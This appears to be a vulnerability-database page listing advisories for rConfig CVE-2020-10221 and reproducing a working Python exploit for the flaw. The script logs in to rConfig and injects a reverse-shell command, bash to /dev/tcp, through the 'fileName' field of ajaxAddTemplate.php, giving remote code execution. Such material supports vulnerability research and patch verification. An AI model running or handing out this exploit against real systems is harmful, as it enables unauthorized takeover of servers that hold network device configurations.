| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| rConfig 3.93 - (ajaxAddTemplate.php) Authenticated Remote Code Execution Exploit | 12 Mar 202000:00 | – | zdt | |
| CVE-2020-10221 | 8 Mar 202000:00 | – | attackerkb | |
| CVE-2020-10220 | 7 Mar 202000:00 | – | attackerkb | |
| CVE-2020-10221 | 8 Nov 202108:58 | – | circl | |
| rConfig OS Command Injection Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| rConfig Arbitrary OS Command Execution Vulnerability | 9 Mar 202000:00 | – | cnvd | |
| rConfig Command Injection (CVE-2020-10221) | 23 Mar 202000:00 | – | checkpoint_advisories | |
| CVE-2020-10221 | 8 Mar 202021:03 | – | cve | |
| CVE-2020-10221 | 8 Mar 202021:03 | – | cvelist | |
| rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution | 12 Mar 202000:00 | – | exploitpack |
# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
# Date: 2020-03-08
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.rconfig.com/
# Version: rConfig <= 3.94
# Tested on: centOS
# CVE: CVE-2020-10221
# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])
login = {
'user':user,
'pass':password,
'sublogin':'1'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)
payload = {
'fileName':payload,
}
print "[+] Sendin exploit ..."
exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'},verify=False)
if exploit.status_code == 200:
print "[+] Everything seems ok, check your listener."
else:
print "[-] Exploit failed, system is patched or credentials are wrong."Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation